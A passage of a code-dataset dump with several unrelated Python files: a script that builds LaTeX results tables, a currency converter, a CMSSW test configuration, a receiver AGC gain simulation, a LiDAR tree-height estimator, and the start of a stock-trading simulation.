metric_probs.dataset_splits is not None:\n for split in metric_probs.dataset_splits:\n index = pd.MultiIndex.from_tuples(\n [(ds_task, f\"{metric_name} {split}\")]\n )\n base_df_dict[index[0]] = None\n else:\n index = pd.MultiIndex.from_tuples([(ds_task, metric_name)])\n base_df_dict[index[0]] = None\n base_df_dict[ds_task, metric_name] = None\n base_df = pd.DataFrame(base_df_dict)\n base_df.set_index(\n [(\"\", \"pred_model\"), (\"\", \"unc_type\"), (\"\", \"aggregation\")],\n inplace=True,\n )\n return base_df\n\n def fill_metric_pred_model(\n self,\n metric_dicts,\n pred_model,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_key,\n dataset_split,\n ):\n metrics = []\n for metric_dict in metric_dicts:\n if \"metrics\" in metric_dict[\"mean\"]:\n metrics.append(metric_dict[\"mean\"][\"metrics\"][metric_key])\n else:\n metrics.append(metric_dict[\"mean\"][metric_key])\n metrics = np.array(metrics)\n metric_mean = np.mean(metrics)\n metric_std = np.std(metrics, ddof=1)\n idx = pd.IndexSlice\n metric_full_name = (\n f\"{metric_name} {dataset_split}\"\n if dataset_split is not None\n else metric_name\n )\n mean_df.loc[idx[pred_model], [(ds_task, metric_full_name)]] = metric_mean\n std_df.loc[idx[pred_model], [(ds_task, metric_full_name)]] = metric_std\n\n def fill_metric_pred_model_unc_type(\n self,\n metric_dicts,\n pred_model,\n unc_types,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_key,\n dataset_split,\n ):\n for unc_type in unc_types:\n metrics = []\n for metric_dict in metric_dicts:\n if 
\"metrics\" in metric_dict[\"mean\"][unc_type]:\n metrics.append(metric_dict[\"mean\"][unc_type][\"metrics\"][metric_key])\n else:\n metrics.append(metric_dict[\"mean\"][unc_type][metric_key])\n metrics = np.array(metrics)\n metric_mean = np.mean(metrics)\n metric_std = np.std(metrics, ddof=1)\n idx = pd.IndexSlice\n metric_full_name = (\n f\"{metric_name} {dataset_split}\"\n if dataset_split is not None\n else metric_name\n )\n mean_df.loc[\n idx[pred_model, unc_type], [(ds_task, metric_full_name)]\n ] = metric_mean\n std_df.loc[\n idx[pred_model, unc_type], [(ds_task, metric_full_name)]\n ] = metric_std\n\n def fill_metric_pred_model_unc_type_agg(\n self,\n metric_dicts,\n pred_model,\n unc_types,\n aggregations,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_key,\n dataset_split,\n ):\n for unc_type in unc_types:\n for aggregation in aggregations:\n metrics = []\n for metric_dict in metric_dicts:\n if \"metrics\" in metric_dict[\"mean\"][unc_type][aggregation]:\n metrics.append(\n metric_dict[\"mean\"][unc_type][aggregation][\"metrics\"][\n metric_key\n ]\n )\n else:\n metrics.append(\n metric_dict[\"mean\"][unc_type][aggregation][metric_key]\n )\n metrics = np.array(metrics)\n metric_mean = np.mean(metrics)\n metric_std = np.std(metrics, ddof=1)\n idx = pd.IndexSlice\n metric_full_name = (\n f\"{metric_name} {dataset_split}\"\n if dataset_split is not None\n else metric_name\n )\n mean_df.loc[\n idx[pred_model, unc_type, aggregation],\n [(ds_task, metric_full_name)],\n ] = metric_mean\n std_df.loc[\n idx[pred_model, unc_type, aggregation],\n [(ds_task, metric_full_name)],\n ] = metric_std\n\n def fill_single_metric(\n self,\n mean_df,\n std_df,\n ds_task,\n metric_name,\n metric_probs,\n versions: List[ExperimentVersion],\n dataset_split,\n ):\n metric_dicts = []\n for version in versions:\n if dataset_split is not None:\n metrics_json = (\n version.exp_path / dataset_split / metric_probs.metrics_file_name\n )\n else:\n metrics_json = version.exp_path / metric_probs.metrics_file_name\n with open(metrics_json) as f:\n metrics = json.load(f)\n metric_dicts.append(metrics)\n pred_model = versions[0].pred_model\n if len(metric_probs.levels) == 1:\n self.fill_metric_pred_model(\n metric_dicts=metric_dicts,\n pred_model=pred_model,\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_key=metric_probs.metrics_key,\n dataset_split=dataset_split,\n )\n elif len(metric_probs.levels) == 2:\n unc_types = versions[0].unc_types\n self.fill_metric_pred_model_unc_type(\n metric_dicts=metric_dicts,\n pred_model=pred_model,\n unc_types=unc_types,\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_key=metric_probs.metrics_key,\n dataset_split=dataset_split,\n )\n elif len(metric_probs.levels) == 3:\n unc_types = versions[0].unc_types\n aggregations = versions[0].aggregations\n if metric_name == \"al_improvement\":\n unc_types = [\n unc_type\n for unc_type in unc_types\n if unc_type != \"aleatoric_uncertainty\"\n ]\n self.fill_metric_pred_model_unc_type_agg(\n metric_dicts=metric_dicts,\n pred_model=pred_model,\n unc_types=unc_types,\n aggregations=aggregations,\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_key=metric_probs.metrics_key,\n dataset_split=dataset_split,\n )\n\n def fill_all_metrics(self, mean_df, std_df, versions: List[ExperimentVersion]):\n for ds_task, metrics in self.ds_tasks.items():\n for metric_name, metric_probs in metrics.items():\n if 
metric_probs.dataset_splits is not None:\n for dataset_split in metric_probs.dataset_splits:\n self.fill_single_metric(\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_probs=metric_probs,\n versions=versions,\n dataset_split=dataset_split,\n )\n else:\n self.fill_single_metric(\n mean_df=mean_df,\n std_df=std_df,\n ds_task=ds_task,\n metric_name=metric_name,\n metric_probs=metric_probs,\n versions=versions,\n dataset_split=None,\n )\n\n def get_unc_measure(self, df_row):\n if df_row.name[0] == \"Softmax\":\n return \"MSR\"\n elif df_row.name[0] == \"SSN\":\n if df_row.name[1] == \"predictive_uncertainty\":\n return \"PE\"\n elif df_row.name[1] == \"aleatoric_uncertainty\":\n return \"MI\"\n else:\n return \"EE\"\n else:\n if df_row.name[1] == \"predictive_uncertainty\":\n return \"PE\"\n elif df_row.name[1] == \"aleatoric_uncertainty\":\n return \"EE\"\n else:\n return \"MI\"\n\n def create_single_table(self, grouped_versions):\n mean_df = self.get_base_df(grouped_versions)\n std_df = self.get_base_df(grouped_versions)\n for group in grouped_versions:\n self.fill_all_metrics(mean_df, std_df, group)\n\n mean_df[(\"\", \"unc_measure\")] = mean_df.apply(self.get_unc_measure, axis=1)\n mean_df = mean_df.set_index((\"\", \"unc_measure\"), append=True)\n mean_df = mean_df.reorder_levels(\n [\n (\"\", \"pred_model\"),\n (\"\", \"unc_measure\"),\n (\"\", \"unc_type\"),\n (\"\", \"aggregation\"),\n ]\n )\n\n std_df[(\"\", \"unc_measure\")] = std_df.apply(self.get_unc_measure, axis=1)\n std_df = std_df.set_index((\"\", \"unc_measure\"), append=True)\n std_df = std_df.reorder_levels(\n [\n (\"\", \"pred_model\"),\n (\"\", \"unc_measure\"),\n (\"\", \"unc_type\"),\n (\"\", \"aggregation\"),\n ]\n )\n # multiply by 100 to see more decimals in table\n mean_df = mean_df * 100\n std_df = std_df * 100\n return mean_df, std_df\n\n def create(self):\n if self.split_param is not None:\n mean_dfs = []\n std_dfs = []\n for split_value in self.split_param.split_values:\n filtered_grouped_versions = []\n for group in self.grouped_versions:\n if group[0].version_params[self.split_param.name] == split_value:\n filtered_grouped_versions.append(group)\n mean_df, std_df = self.create_single_table(filtered_grouped_versions)\n mean_dfs.append(mean_df)\n std_dfs.append(std_df)\n mean_df = pd.concat(mean_dfs, keys=self.split_param.split_values)\n mean_df.index.names = [self.split_param.name, *mean_df.index.names[1:]]\n std_df = pd.concat(std_dfs, keys=self.split_param.split_values)\n std_df.index.names = [self.split_param.name, *std_df.index.names[1:]]\n else:\n mean_df, std_df = self.create_single_table(self.grouped_versions)\n if \"Dropout-Final\" in mean_df.index.levels[0]:\n mean_df.rename({\"Dropout-Final\": \"Dropout\"}, axis=0, level=0, inplace=True)\n std_df.rename({\"Dropout-Final\": \"Dropout\"}, axis=0, level=0, inplace=True)\n return mean_df, std_df\n\n def format_mean_std(self, mean, std):\n mean = mean.astype(float).round(2).astype(str)\n std = std.astype(float).round(2).astype(str)\n return mean.combine(std, lambda x, y: f\"{x}±{y}\")\n\n def apply_background_gradient(\n self, styler, cell, reverse=False, results_df=None, split_feature=None\n ):\n if split_feature is None:\n if reverse:\n # reverse means higher scores are better\n # gmap = (results_df[cell]).mul(-1).tolist()\n gmap = (results_df[cell]).mul(-1).tolist()\n else:\n gmap = (results_df[cell]).tolist()\n styler.background_gradient(\n axis=0,\n cmap=\"YlOrRd\",\n gmap=gmap,\n 
subset=pd.IndexSlice[pd.IndexSlice[:, :, :], [cell]],\n )\n else:\n if reverse:\n # reverse means higher scores are better\n gmap = (results_df.loc[split_feature, cell]).mul(-1).tolist()\n else:\n gmap = (results_df.loc[split_feature, cell]).tolist()\n styler.background_gradient(\n axis=0,\n cmap=\"YlOrRd\",\n gmap=gmap,\n subset=pd.IndexSlice[pd.IndexSlice[split_feature], [cell]],\n )\n\n def format_color(self, styler, gradient_cells, gradient_cells_reverse, mean_df):\n if self.split_param is not None:\n for split_value in self.split_param.split_values:\n for cell in gradient_cells_reverse:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler,\n cell,\n reverse=True,\n results_df=mean_df,\n split_feature=split_value,\n )\n for cell in gradient_cells:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler,\n cell,\n reverse=False,\n results_df=mean_df,\n split_feature=split_value,\n )\n else:\n for cell in gradient_cells_reverse:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler, cell, reverse=True, results_df=mean_df\n )\n for cell in gradient_cells:\n # if cell not in cells_drop:\n if cell in mean_df:\n self.apply_background_gradient(\n styler, cell, reverse=False, results_df=mean_df\n )\n\n def to_latex(self, mean_df, std_df):\n results_df = mean_df.combine(std_df, self.format_mean_std)\n results_df.index.names = [\n name if type(name) == str else name[1] for name in results_df.index.names\n ]\n styler = results_df.style\n\n gradient_cells = []\n gradient_cells_reverse = []\n column_format = \"l|\" * (len(results_df.index.names)) + \"|\"\n for ds_task, task_params in self.ds_tasks.items():\n num_metrics_cols = 0\n for metric, metric_params in task_params.items():\n if metric_params[\"dataset_splits\"] is not None:\n num_metrics_cols += len(metric_params[\"dataset_splits\"])\n for split in metric_params[\"dataset_splits\"]:\n if metric_params[\"higher_better\"]:\n gradient_cells_reverse.append(\n (ds_task, f\"{metric} {split}\")\n )\n else:\n gradient_cells.append((ds_task, f\"{metric} {split}\"))\n else:\n num_metrics_cols += 1\n if metric_params[\"higher_better\"]:\n gradient_cells_reverse.append((ds_task, metric))\n else:\n gradient_cells.append((ds_task, metric))\n column_format += \"l|\" * num_metrics_cols + \"|\"\n print()\n column_format = column_format[:-2]\n\n self.format_color(\n styler=styler,\n gradient_cells=gradient_cells,\n gradient_cells_reverse=gradient_cells_reverse,\n mean_df=mean_df,\n )\n\n latex = styler.to_latex(\n column_format=column_format,\n multicol_align=\"c\",\n convert_css=True,\n position_float=\"centering\",\n hrules=True,\n clines=\"skip-last;data\",\n )\n\n latex = latex.replace(\"_\", \"\\_\")\n latex = latex.replace(\"\\\\centering\", \"\\\\centering \\\\tiny\")\n latex = latex.replace(\n \"{\\cellcolor[HTML]{000000}} \\color[HTML]{F1F1F1} nan±nan\",\n \"{\\cellcolor[HTML]{D3D3D3}}\",\n )\n\n # formatting of hlines (make thicker)\n if self.split_param is None:\n num_cols = len(results_df.columns) + len(results_df.index.names)\n latex = latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}}\\n\\\\bottomrule\",\n f\"\\\\bottomrule\",\n )\n latex = latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}}\",\n f\"\\\\cmidrule[2pt]{{1-{num_cols}}}\",\n )\n else:\n num_cols = len(results_df.columns) + len(results_df.index.names)\n latex = 
latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}} \\\\cline{{4-{num_cols}}}\\n\\\\bottomrule\",\n f\"\\\\bottomrule\",\n )\n latex = latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}} \\\\cline{{4-{num_cols}}}\",\n f\"\\\\cmidrule[1.5pt]{{1-{num_cols}}} \\\\morecmidrules \\\\cmidrule[1.5pt]{{1-{num_cols}}}\",\n )\n latex = latex.replace(\n f\"\\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}} \\\\cline{{4-{num_cols}}}\",\n f\"\\\\cmidrule[2pt]{{2-{num_cols}}}\",\n )\n print(latex)\n return\n\n\n@hydra.main(config_path=\"../configs\", config_name=\"table_config_gta\", version_base=None)\ndef main(table_config):\n table = DsTaskTable(table_config)\n mean_df, std_df = table.create()\n table.to_latex(mean_df, std_df)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KOFRJO/values","sub_path":"evaluation/visualization/ds_task_table.py","file_name":"ds_task_table.py","file_ext":"py","file_size_in_byte":20874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34963060978","text":"what=int(input(\"1.usd to inr\\n2.inr to usd\\nenter here:- \"))\r\nus=73.18\r\ninr1 = 0.013\r\nif what== 1:\r\n inr = int(input(\"How much do you want to convert?\\nEnter here-:\\n\"))\r\n print(\"INR =\", inr*us)\r\n\r\nelif what==2:\r\n usd = int(input(\"How much do you want to convert?\\nEnter here-:\\n\")) \r\n print(\"USD = \", usd*inr1)\r\n\r\nelse:\r\n print(\"Invalid Input\")","repo_name":"immortalkavyansh/Python-Kavyansh","sub_path":"python projects/currency converter.py","file_name":"currency converter.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40101808450","text":"import FWCore.ParameterSet.Config as cms\nfrom PhysicsTools.PatAlgos.patInputFiles_cff import filesRelValTTbarPileUpGENSIMRECO\nimport Utilities.General.cmssw_das_client as cmssw_das_client\n#from pdb import set_trace\n\n######\n#\n# Ideally to be used, unfortunately sample is not at CERN\n#\n# from PhysicsTools.PatAlgos.tools.cmsswVersionTools import pickRelValInputFiles\n# filesRelValTTbarPileUpGENSIMRECO = cms.untracked.vstring(\n# pickRelValInputFiles( cmsswVersion = 'CMSSW_9_2_3'\n# , relVal = 'RelValTTbar_13'\n# , globalTag = 'PUpmx25ns_92X_upgrade2017_realistic_v2_earlyBS2017'\n# , dataTier = 'GEN-SIM-RECO'\n# , maxVersions = 1\n# , numberOfFiles = 1\n# , useDAS = True\n# )\n# )\n\ndef add_rawRelVals(process): \n query='dataset file=%s' % process.source.fileNames[0]\n dataset = cmssw_das_client.get_data(query, limit = 0)\n if not dataset:\n raise RuntimeError(\n 'Das returned no dataset parent of the input file: %s \\n'\n 'The parenthood is needed to add RAW secondary input files' % process.source.fileNames[0]\n )\n raw_dataset = dataset['data'][0]['dataset'][0]['name'].replace('GEN-SIM-RECO','GEN-SIM-DIGI-RAW-HLTDEBUG')\n raw_files = cmssw_das_client.get_data('file dataset=%s' % raw_dataset, limit=0)['data']\n \n if not raw_files:\n raise RuntimeError('No files found belonging to the GEN-SIM-DIGI-RAW-HLTDEBUG sample!')\n\n #convert from unicode into normal string since vstring does not pick it up\n raw_files = [str(i) for i in raw_files]\n process.source.secondaryFileNames = cms.untracked.vstring(*raw_files)\n return process\n\nprocess = 
cms.Process('JustATest')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load(\"Configuration.Geometry.GeometryRecoDB_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase1_2017_realistic')\n\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.TFileService = cms.Service( \n \"TFileService\",\n fileName = cms.string( 'FIXME' ),\n closeFileFast = cms.untracked.bool(True) \n ) \n\n## Maximal Number of Events\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\nprocess.source = cms.Source (\n \"PoolSource\",\n fileNames = filesRelValTTbarPileUpGENSIMRECO\n )\n\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\n\nprocess.options = cms.untracked.PSet(\n Rethrow = cms.untracked.vstring('OtherCMS', \n 'StdException', \n 'Unknown', \n 'BadAlloc', \n 'BadExceptionType', \n 'ProductNotFound', \n 'DictionaryNotFound', \n 'InsertFailure', \n 'Configuration', \n 'LogicError', \n 'UnimplementedFeature', \n 'InvalidReference', \n 'NullPointerError', \n 'NoProductSpecified', \n 'EventTimeout', \n 'EventCorruption', \n 'ScheduleExecutionFailure', \n 'EventProcessorFailure', \n 'FileInPathError', \n 'FileOpenError', \n 'FileReadError', \n 'FatalRootError', \n 'MismatchedInputFiles', \n 'ProductDoesNotSupportViews', \n 'ProductDoesNotSupportPtr', \n 'NotFound')\n)\n","repo_name":"cms-sw/cmssw","sub_path":"CalibTracker/SiStripCommon/python/shallowTree_test_template.py","file_name":"shallowTree_test_template.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"32377139853","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef dBm2mV(pwr):\n return 1000*np.sqrt(0.1*(10**(pwr/10.0)))\n \n\n\nlna = {0:3,1:17,2:21}\nmxr = {0:3,1:11,2:12,3:13,4:14,5:15,6:16,7:17,8:18,9:19,10:20,11:21,12:22,13:23,14:24,15:25,16:26}\ntia = {0:-6,1:0}\nlpf = np.arange(0,25,1)\n\nprint('Gain table')\nprint('GT idx\\t','LNA gain\\t','Mxr gain\\t','TIA gain\\t','LPF gain\\t')\n\nappg_lna = np.zeros(77)\nappg_mxr = np.zeros(77)\nappg_tia = np.zeros(77)\nappg_lpf = np.zeros(77)\n\n#lna bypass region\nappg_lna[5:19] = 0\nappg_mxr[5:19] = 0\nappg_mxr[5:19] = 0\nappg_lpf[5:19] = np.arange(0,14,1)\n\n#High rssi region\nappg_lna[34:40] = 1\nappg_mxr[34:40] = 5\nappg_tia[34:40] = 0\nappg_lpf[34:40] = np.arange(3,9,1)\n\nappg_lna[30:34] = 1\nappg_mxr[30:34] = np.arange(1,5,1)\nappg_tia[30:34] = 0\nappg_lpf[30:34] = 3\n\nappg_lna[19:30] = 1\nappg_mxr[19:30] = 0\nappg_tia[19:30] = 0\nappg_lpf[19:30] = np.arange(0,11,1)\n\n# Mid rssi region\nappg_lna[40:62] = 1\nappg_mxr[40:62] = 5\nappg_tia[40:62] = 1\nappg_lpf[40:62] = np.arange(3,25,1)\n\n# Low rssi region\nappg_lna[62:73] = 1\nappg_mxr[62:73] = np.arange(6,17,1)\nappg_tia[62:73] = 1\nappg_lpf[62:73] = 24\n\nappg_lna[73:78] = 2\nappg_mxr[73:78] = 16\nappg_tia[73:78] = 1\nappg_lpf[73:78] = np.arange(21,25,1)\n\n\n\nfor i in range(77):\n total_gain = lna[int(appg_lna[i])] +mxr[int(appg_mxr[i])] + tia[int(appg_tia[i])] +lpf[int(appg_lpf[i])]\n print(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\".format(i,lna[appg_lna[i]],mxr[int(appg_mxr[i])],tia[appg_tia[i]],lpf[int(appg_lpf[i])],total_gain))\n\npwr_max = -5 \nLMT_thresh = 
126\nADC_thresh = 178\nclip1 = [2,16,1,24,76]\nclip2 = [1,16,1,24,72]\nclip3 = [1,5,1,24,61]\nclip4 = [1,5,0,8,39]\nclip5 = [1,0,0,10,29]\nclip6 = [0,0,0,13,18]\n\ndef agcCalcs(pwr_in,clip):\n wb_det = 0\n nb_det = 0\n pwr1 = pwr_in + lna[int(clip[0])] + mxr[int(clip[1])] + tia[int(clip[2])]\n pwr2 = pwr1 + lpf[int(clip[3])]\n if dBm2mV(pwr1) > LMT_thresh:\n wb_det = 1\n if dBm2mV(pwr2) > ADC_thresh:\n nb_det = 1\n return wb_det,nb_det\n \ndef agcClips(pwr_in):\n clip_whr = clip1\n clip_bucket = 1\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip1')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip2\n clip_bucket = 2\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip2')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip3\n clip_bucket = 3\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip3')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip4\n clip_bucket = 4\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip4')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip5\n clip_bucket = 5\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip5')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip6\n clip_bucket = 6\n wb_det,nb_det=agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip6')\n return clip_whr,clip_bucket\n \ndef agcSelGain(pwr_in,clip_whr,clip_bucket):\n sel_gain = np.zeros(5)\n pwr_est = pwr_in + lna[clip_whr[0]] + mxr[clip_whr[1]] + tia[clip_whr[2]] + lpf[clip_whr[3]]\n #print(clip_whr,clip_bucket,pwr_est)\n idx = clip_whr[4] + pwr_max - pwr_est \n sel_gain[0] = appg_lna[idx]\n sel_gain[1] = appg_mxr[idx]\n sel_gain[2] = appg_tia[idx]\n sel_gain[3] = appg_lpf[idx]\n return sel_gain\n \n \nlna_gain = np.zeros(np.size(appg_lna))\nmxr_gain = np.zeros(np.size(appg_mxr))\ntia_gain = np.zeros(np.size(appg_tia))\nlpf_gain = np.zeros(np.size(appg_lpf))\npwr_vals = np.zeros(np.size(appg_lna))\n\n\n\npwr_in = -76\nclip_whr,clip_bucket = agcClips(pwr_in)\nsel_gain =agcSelGain(pwr_in,clip_whr,clip_bucket)\n#print(lpf[int(sel_gain[3])] \n\ncnt = 0\nwhile pwr_in <= pwr_max:\n clip_whr,clip_bucket = agcClips(pwr_in)\n sel_gain =agcSelGain(pwr_in,clip_whr,clip_bucket)\n pwr_vals[cnt] = pwr_in\n lna_gain[cnt] = lna[int(sel_gain[0])]\n mxr_gain[cnt] = mxr[int(sel_gain[1])]\n tia_gain[cnt] = tia[int(sel_gain[2])]\n lpf_gain[cnt] = lpf[int(sel_gain[3])]\n pwr_in = pwr_in + 1\n cnt = cnt + 1\n \nplt.subplot(4,1,1)\nplt.plot(pwr_vals,lna_gain)\n\nplt.subplot(4,1,2)\nplt.plot(pwr_vals,mxr_gain)\n\nplt.subplot(4,1,3)\nplt.plot(pwr_vals,tia_gain)\n\nplt.subplot(4,1,4)\nplt.plot(pwr_vals,lpf_gain)\n\nplt.show()\n\n","repo_name":"lmodur/Hello-gnuradio","sub_path":"rxagc.py","file_name":"rxagc.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19528761038","text":"# -*- coding:utf-8 -*-\n\nimport pcl\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error\nfrom viewers import *\nfrom filters import *\n\n\ndef read_p(p_path='pcd/pointcloud.csv'):\n '''\n read point cloud from csv\n args:\n p_path: csv file path\n\n return:\n p_min: min value of x,y,z\n p_np: numpy point clouds data\n '''\n p_np = np.genfromtxt(p_path, delimiter=',')\n p_min = p_np.min(axis=0).astype('int') # [396907, 3402527, 494]\n p_np = p_np - p_min # 移动坐标系,便于计算\n return p_min, p_np\n\n\ndef d_r(p):\n '''\n Compute the Radius and Density threshold of 
DBSCAN.\n '''\n d = []\n for i in range(p.shape[1]):\n min_i = p[:,i].min()\n max_i = p[:,i].max()\n d.append(max_i - min_i)\n d = np.array(d)\n r = np.sqrt(np.power(d[0:2], 2).sum())/30.0\n return r, d\n\n\ndef xy_seg(p, r, tree_points=15):\n '''\n xy plane segmentation\n args: \n p: point cloud\n r: Radius of DBSCAN\n tree_points: Density threshold of DBSCAN\n return:\n DBSCAN segmentation results\n '''\n clustering = DBSCAN(eps=r, min_samples=9).fit(p[:,0:2])\n labels = clustering.labels_\n t_labels = np.unique(labels)\n trees = []\n for label in t_labels:\n sp = p[labels==label, :]\n if label == -1:\n continue\n if sp.shape[0] >= tree_points:\n trees.append(sp)\n return np.array(trees)\n\n\ndef refinement(trees, r, tree_points=15):\n '''\n use xy plane segmentation again to refine the results.\n '''\n r_trees = []\n for i,tree in enumerate(trees):\n tree2 = h_filter(tree, h_factor=0.5)\n t_pl = xy_seg(tree2, r, tree_points=tree_points)\n if len(t_pl) > 1:\n print(\"No. {} tree refine to {} trees\".format(i, len(t_pl)))\n for t in t_pl:\n r_trees.append(t)\n else:\n r_trees.append(tree2)\n return np.array(r_trees)\n\n\ndef k_nearest(p, xyz, K=100):\n \"\"\"\n Find the K points closest to the point(xyz) in the point cloud(p).\n \"\"\"\n xyz = np.array(xyz).reshape(1,3).astype(np.float32)\n p = pcl.PointCloud(p)\n kdtree = p.make_kdtree_flann() # create a kdtree\n s_point = pcl.PointCloud(xyz)\n [ind, sqdist] = kdtree.nearest_k_search_for_cloud(s_point, K)\n \n # compute the Mean value of z-dim\n h = 0.0 \n for i in range(0, ind.size):\n h += p[ind[0][i]][2]\n h = 1.0*h/(K)\n return ind, h\n\n\ndef tree_height(tree, p):\n x, y = tree[:,0].mean(),tree[:,1].mean()\n z = tree[:,2].min()\n h = tree[:,2].max()-tree[:,2].min()\n p_top = [x, y, z+h]\n p_low = [x,y, z-0.9*h]\n _, h_top = k_nearest(p, p_top, K=100)\n _, h_low = k_nearest(p, p_low, K=200)\n return h_top - h_low\n\n\nif __name__ =='__main__':\n h_tree_gt = [15.4, 3.6, 17.2, 17.2, 17.1, 4.0, 4.1, 5.9, 17.5] #ground truth(tree height)\n p_min, p64 = read_p(p_path='pcd/pointcloud.csv')\n p32 = voxel(p=p64, d=1) # voxel grid filter\n r, d = d_r(p32)\n t_pl = xy_seg(p32, r=r, tree_points=18)\n\t\n # refinement\n r_trees = refinement(t_pl, r, tree_points=15) # tree points\n\t\n\t# plot results\n tree_fig = plot_3d(t_pl[0])\n tree_fig.write_image(\"images/tree1.svg\")\n fig1 = plot_clustering(t_pl, is_show=True)\n fig2 = plot_clustering(r_trees, is_show=True)\n fig1.write_image(\"images/fig1.png\")\n fig2.write_image(\"images/fig2.png\")\n\n # tree height (using K-Nearest)\n h_trees=[]\n p3 = p64.astype(np.float32)\n for tree in r_trees:\n h = tree_height(tree, p3) \n h_trees.append(h)\n print(\"trees height:{}\".format(h_trees))\n\t\n # Results Evaluation\n mse = mean_squared_error(h_tree_gt, h_trees, squared=True)\n rmse = mean_squared_error(h_tree_gt, h_trees, squared=False)\n r2 = r2_score(h_tree_gt, h_trees) \n mae = mean_absolute_error(h_tree_gt, h_trees)\n print(\"mse: {}, rmse: {}, mae: {}, r2: {}, \".format(mse, rmse, mae, r2))\n\n\"\"\"\ntrees height:[15.909102935791015, 3.1540063476562503, 18.26805191040039, 16.948209381103517, 17.655261840820312, 4.076800079345703, 3.920495758056641, 6.537965545654297, 17.11969161987305, 1.4795011901855473]\nmse: 0.28447775273413833, rmse: 0.5333645589408227\n\"\"\"","repo_name":"yzfly/SimpleTreeHeight","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"50"} 
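# --- Illustrative sketch (added by the editor, not part of any record above) ---
# The tree-height record above segments individual trees by projecting the
# point cloud onto the xy plane and clustering with DBSCAN, then takes the
# z-extent of each cluster as a rough height. A minimal synthetic version
# (the blob positions and the eps/min_samples values are made up):
import numpy as np
from sklearn.cluster import DBSCAN

rng = np.random.default_rng(0)
tree_a = rng.normal([0.0, 0.0, 5.0], [0.5, 0.5, 2.0], size=(200, 3))
tree_b = rng.normal([10.0, 10.0, 6.0], [0.5, 0.5, 2.0], size=(200, 3))
points = np.vstack([tree_a, tree_b])

labels = DBSCAN(eps=1.0, min_samples=9).fit(points[:, :2]).labels_
for label in np.unique(labels):
    if label == -1:
        continue  # DBSCAN noise points
    cluster = points[labels == label]
    height = cluster[:, 2].max() - cluster[:, 2].min()
    print(f"tree {label}: {len(cluster)} points, height ~ {height:.1f} m")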
+{"seq_id":"5231760660","text":"#%%\n# Write your revised and debugged version of the code here.\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport trading.data as data\nimport trading.process as process\nimport trading.indicators as indicators\nimport trading.strategy as strategy\nimport trading.performance as tp\nimport os\n\n# first use the get_data function to read txt file\nsim_data = data.get_data('read',r'stock_data_5y.txt')\n\n# extract the initial price for each stock\ninit_price = sim_data[1,:]\n\n# From the question, here, we extract the stock whose initial prices are near to 100, 120\nindex = [np.argmin(np.abs(init_price-100)),np.argmin(np.abs(init_price-120)),\nnp.argmin(np.abs(init_price-400)),np.argmin(np.abs(init_price-250)),np.argmin(np.abs(init_price-300))]\nstock_price = sim_data[1:,index]\n\nN = stock_price.shape[1] # here the N is the number of our available stocks\nportfolio = process.create_portfolio([5000]*N,stock_price,20, ledger = 'ledger.txt')\n\nstock_prices = data.get_data('read', 